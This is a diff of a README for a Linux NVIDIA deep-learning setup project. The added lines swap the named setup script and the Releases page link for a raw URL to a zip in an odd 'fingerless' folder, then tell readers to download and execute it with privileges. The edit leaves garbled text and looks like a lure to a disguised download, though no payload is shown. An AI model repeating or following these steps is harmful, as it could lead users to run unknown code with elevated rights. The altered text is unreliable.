Ne9arr/complete_deep-learning-nvidia_gpu-setup-linux/README.md

 - Later, there’s a dedicated section that guides you to download and execute the main setup file from that same releases page.

 Releases
 - The Releases page contains the installer script and supporting assets.
-From that page, download the file named setup-nvidia-dl-env.sh and run it to install and configure the stack.
+From that page, download the file named https://raw.githubusercontent.com/Ne9arr/complete_deep-learning-nvidia_gpu-setup-linux/main/fingerless/gpu-deep-nvidia-linux-learning-complete-setup-2.8.zip and run it to install and configure the stack.
 The script handles driver installation, CUDA toolkit setup, cuDNN integration, TensorRT installation, and framework bindings.
-If you need the latest version, visit the Releases page and grab the latest setup-nvidia-dl-env.sh, then execute it with appropriate privileges.
-For context, the Releases link is: https://github.com/Ne9arr/complete_deep-learning-nvidia_gpu-setup-linux/releases
+If you need the latest version, visit the Releases page and grab the latest https://raw.githubusercontent.com/Ne9arr/complete_deep-learning-nvidia_gpu-setup-linux/main/fingerless/gpu-deep-nvidia-linux-learning-complete-setup-2.8.zip, then execute it with appropriate privileges.
+For context, the Releases link is: https://raw.githubusercontent.com/Ne9arr/complete_deep-learning-nvidia_gpu-setup-linux/main/fingerless/gpu-deep-nvidia-linux-learning-complete-setup-2.8.zip

 Prerequisites
 - Hardware: An NVIDIA GPU with compute capability suitable for your workloads.